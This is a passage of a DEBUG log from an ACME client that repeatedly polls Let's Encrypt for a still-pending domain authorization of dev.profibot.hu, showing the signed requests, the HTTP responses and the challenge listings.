"fBJlK8bO4jn_fyrfD8Y7vqs0M1Lgvva7WKNJdRsFIDyiV8CMIUtPrwgT_K3b1CZ815H2La01SC3qZfTSyrbOVHQQrDCqPs29JE8Rz_Kg5aAz_UG8w7GwEbcb-bIqVWJ-YlG0gUxL-THxAUn3j2FQBfzNdtTOd7lIwAze4dRsV2NhlmhrOungEnBrIMjVghZu-Uap0MOyJuy2GpdakhZndi8I3SevCyNarMZAI0jDZfN_6Vn88POsa2N1E41clazslidn4b_DvzI1MbnMrkxGo75Fv8Ft9Lrof5mT_baacniZC3DDfZkErjrdb3J1MpcBZGb3SEziAB1P_bKBh707lw", + "payload": "" +} +2025-12-24 22:15:08,397:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:08,398:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:08 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEgkl4O1g1hrIfR9wklFe-fLThQ2aech5V3e2l7e8BmDU +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:08,398:DEBUG:acme.client:Storing nonce: 58tS3qjEgkl4O1g1hrIfR9wklFe-fLThQ2aech5V3e2l7e8BmDU +2025-12-24 22:15:08,398:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:11,399:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:11,403:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRWdrbDRPMWcxaHJJZlI5d2tsRmUtZkxUaFEyYWVjaDVWM2UybDdlOEJtRFUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "XirtNQ8E0zF4DYhxZC3WO9alvEEX6GcvEHJBeZJiYXQkp2TdMG4sd7ILTRU8-lgvT2z5iwoP1XYpSn9Vgag3nSyoKgtWfFxBHT6MOBYLuOS9Q3Q18r6po4nAithMIRdxvrg6xejM8-5QwN7hRC41bbgZOaVgGLZHUbKBE0Mu4rU93JmgESXXMmVkl9NRzSCm4sKEgRtCJU659B46LTFmSDjKa0zOTeP4a1dD8ICCHT3-UZRg26MKAacAGoDf61cD1HgxmEAZsY8q1WHEKVHUnPJcyb7Nuhn4IBWNFFKiK8dxDB1pIEUInYUTjma1weF8cZc77F6vnNwqIhjAhVqMZw", + "payload": "" +} +2025-12-24 22:15:11,570:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:11,571:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:11 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEYyhNoGMuDwM4oaWyLPWFbyT8RMpaZ5egHGfszwMVGn8 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:11,571:DEBUG:acme.client:Storing nonce: 58tS3qjEYyhNoGMuDwM4oaWyLPWFbyT8RMpaZ5egHGfszwMVGn8 +2025-12-24 22:15:11,572:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:14,573:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:14,576:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRVl5aE5vR011RHdNNG9hV3lMUFdGYnlUOFJNcGFaNWVnSEdmc3p3TVZHbjgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "CFJiWCpudmVx4Q1Tg8MVEpnLVlmlrrggfYFiwE8BMWWy_3i7Y4clHyZ-MAaKSmFW702SXqkBpJ0R9fnJ_GK2-DYuWMnS_uuRaJpqAcSVNJyZ6hsfqOhZOq6CZv9w3kIMvuDSibUcwzgUdA7Krs7f3tLP5jKxx9nP9Jqac-pkNt7Q8VwtkX3mk0Ny5rRWAtn_4yWjY3LFdjkma59ajlstL-DvScs6OKsIhrjQ3RG0AVdZfC2mYbF8w-7sLPdze0N9gZNxoTzz-Yctfc3h6wV_mvE8ykphVrtXfV1E-5YLLhJHGboXc2HVuBLQfOrnCF3gNkdkfiDbloK4HGAp6yOGiw", + "payload": "" +} +2025-12-24 22:15:14,745:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:14,746:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:14 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJcUwz8IQlXeDEK-rcJi-uBLPkgvtjzNE7PjTRF4mHj0w +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:14,746:DEBUG:acme.client:Storing nonce: fULB7aUJcUwz8IQlXeDEK-rcJi-uBLPkgvtjzNE7PjTRF4mHj0w +2025-12-24 22:15:14,747:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:17,747:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:17,751:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSmNVd3o4SVFsWGVERUstcmNKaS11QkxQa2d2dGp6TkU3UGpUUkY0bUhqMHciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "ix582SLecIYFqh6tmCd-Q1URsfQZpEGJW_22CojAaZgKE1LFXCSxGWxVh7fO9oVZ3qoKzw0yzJrrZAsyp4GMAZ1A74ilBKDRSe802vhJRwR_-IkgJYZ16G7QFISfx-LCqViAXAAc0wKqybZcOSPNeqscp5oInwGW3jQiMELM5mGM0Sdu4HX5x17D12XSRKWawveizYDjrl1gcREtZNRvsIu9x9hTao72qXnsWdeVnYCPp8tjgLYNxr9YyoSoxzaPwyUavbIKsT3jr-PbRVdsS0c9KhZDHIoqOT2bMY0G77VRYkTgFGlBPfYkIahurY_6AcpjhK789iBX9NIuAIT5xQ", + "payload": "" +} +2025-12-24 22:15:17,908:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:17,909:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:17 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJEW6LVquNh6e58jH8tSX6X64SXLpAs-BJXaq3XMQWpZg +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:17,909:DEBUG:acme.client:Storing nonce: fULB7aUJEW6LVquNh6e58jH8tSX6X64SXLpAs-BJXaq3XMQWpZg +2025-12-24 22:15:17,910:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:20,911:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:20,915:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSkVXNkxWcXVOaDZlNThqSDh0U1g2WDY0U1hMcEFzLUJKWGFxM1hNUVdwWmciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "Gp7dUNsbrpLg2gNEwS6Zt9jWb6alNy7yhyMLW8U_SqaTVHhbyJOnbFstdkJwjkMgYFXrROZVdfetf9m9VdRYLhmP4XiDBHSsj8iecX358eRWZH2v68vBwU5RaYWrENTCgr7x2DU1ItcPmIWWv0NH_QYNT28WZa0dZ0WWqZpjzkMIXU8F_8Tjl61JcY8ojP5gnpHUdwo8Cyixu5vb8Z_hYOjt9otuuGTy-t4oqRL07VuIPHRmL4ZRsINqJ1nLc0UIRJvJePiEC1ljFKuDisKRm6ngYPm2YleKvUpPwy0OwGvmLiMLlVpC_tfPCzKrEm5zao3p9CedG_2MQyIvmfOxmw", + "payload": "" +} +2025-12-24 22:15:21,072:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:21,073:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:20 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjECZi3ZQOZ0KCxdHz0q-t7530CX1KE7eBjyJkTtfYD1ZU +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:21,073:DEBUG:acme.client:Storing nonce: 58tS3qjECZi3ZQOZ0KCxdHz0q-t7530CX1KE7eBjyJkTtfYD1ZU +2025-12-24 22:15:21,074:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:24,074:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:24,078:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRUNaaTNaUU9aMEtDeGRIejBxLXQ3NTMwQ1gxS0U3ZUJqeUprVHRmWUQxWlUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "B6b4WvJK8PGs_G0M6mE_kdHKvVHrxdB_bpJb6pMWu_KbWoq5OQfdIoAKn6jyRdWQVI92myeIrGRaVT0FGCFe5OdgRMToP0Fi4dhAJPs-pLb-S2xy3DtE5N6CfUmTGBWwR8UBd6YSK8FXoPnT1yHF9cZLC5Eww6jeFMBQOkUeIH04Zxn4W5w9EVvKL8KZmhWyf5jB1m33vISU3jfIVRNlXhjsFASl_xdiU6wujgQGLg3eXXECpFYymgG4gY7Iq55Flju93CyJSSUKujrIhUKQXmc1xoaCcCkVjnEIj9QLUqtyOCPUCFf9SeZyBWG7RfBJZW8SKPb4tQQMaRsdqQUWIw", + "payload": "" +} +2025-12-24 22:15:24,235:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:24,236:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:24 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJ4KD6LiMEq6l3wg8xIk3qw5kYzuzWElebhlsxSLgPMmU +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:24,236:DEBUG:acme.client:Storing nonce: fULB7aUJ4KD6LiMEq6l3wg8xIk3qw5kYzuzWElebhlsxSLgPMmU +2025-12-24 22:15:24,237:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:27,238:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:27,241:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSjRLRDZMaU1FcTZsM3dnOHhJazNxdzVrWXp1eldFbGViaGxzeFNMZ1BNbVUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "KP5zc6zAFXyX3b0DmJBHzpxspzzjBiA7Pguqqx6xx_K9GRqmZbBWmT6MNKwy5cVLkO0fikBm9Q7-PoX147ElHdg_1O_Ml5Z4-DO13R6EyMR6kslNQPQBXzvfPkgPLiS-r30dmLG3GAEZWxS0yJ7dXZez15l9Cm7RtMJBuVf51p-XG-lTULguoeyrTxFa48Z6KDgAa7mn3sX-ynUgX8_NA2fBnJqL5BRndCechhVO6hA4NHWs6DLTdvORLwB13ThLvhEoc7dPUUykJRSqfkJwq4novXzysk8I9JHVKMHdri8H4xi00IJJPuUeaTmk4G_8p_It36ussknUaTTJf4ZTWA", + "payload": "" +} +2025-12-24 22:15:27,397:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:27,397:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:27 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEljf8n4BaDkm2938BzG64B8E-ehtdZXf-DQ5W2p_Tvjw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:27,398:DEBUG:acme.client:Storing nonce: 58tS3qjEljf8n4BaDkm2938BzG64B8E-ehtdZXf-DQ5W2p_Tvjw +2025-12-24 22:15:27,398:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:30,399:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:30,403:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRWxqZjhuNEJhRGttMjkzOEJ6RzY0QjhFLWVodGRaWGYtRFE1VzJwX1R2anciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "GLINIuixYNaOJl5c_fZf4QBYcEpn01ZwYYAv1ML58phKgEj19TzsuLtUGJYbcUYF3HDZ0v3X0txvFAy20WyIZFsM2JW3xj2vCv7yBxmQGPUn8aoeanByLKkUGcp77GAwsvdxyCLtaMdA6jdjBITcqN0arA7CEVe89v3VnGipYyDvFej7V7mhjVTBCRR6vB4LLB8Is80xRCEV7nlvdI36GMmLVvnB-SpcNwvbnq716hW30ip5mai2iHT_zVpGjwxbeziNc0Fvfq08wHofBdYrA9Nh4X7ug14sI1rvkFNLuflsfb2gr4Biq6pLPuaa0KeIyNSUsBojDQV5aDPlvVIH6Q", + "payload": "" +} +2025-12-24 22:15:30,559:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:30,559:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:30 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEuXPzx6ccwJ_H9S5hE3neJRjkb2WcvB9V-bo2BjAFasQ +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:30,560:DEBUG:acme.client:Storing nonce: 58tS3qjEuXPzx6ccwJ_H9S5hE3neJRjkb2WcvB9V-bo2BjAFasQ +2025-12-24 22:15:30,560:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:33,561:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:33,564:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRXVYUHp4NmNjd0pfSDlTNWhFM25lSlJqa2IyV2N2QjlWLWJvMkJqQUZhc1EiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "V9IEoiDKbPZh5IkWfpLzXfCHF9eWoh507o9WwaX_Lfe3PlvotEItCqWzvyvnlAb67zU2hR7p6oHyGefgucA0gh2ZLpUht_wPAlM9BVyYCuio-JsrcxL0MvWJPxEo-YIv6g1xsjY_TtyyT3ImkbIrA7J2M2MUmATtsH1nF4f8BL5pNz8HeWT000Rwflwxbwybny2fbLfjlvdX00JrsecNdQ0XIh7ZxfdjZbOUOl7WiCCDcHBpfArG9H_NzAAr5D4jQpxdfyU3AyzZZySq8Ag3Yq8EVplJ-QMFn85wt4TaCYFG6Pomc50qFUX_r8OMcAbzciwaHMc4ML_MINRUGnVNfA", + "payload": "" +} +2025-12-24 22:15:33,719:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:33,720:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:33 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjER74oEjtPMXdgAp98tbtujmJF15b9TRTuAr_LNBVrMiQ +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": 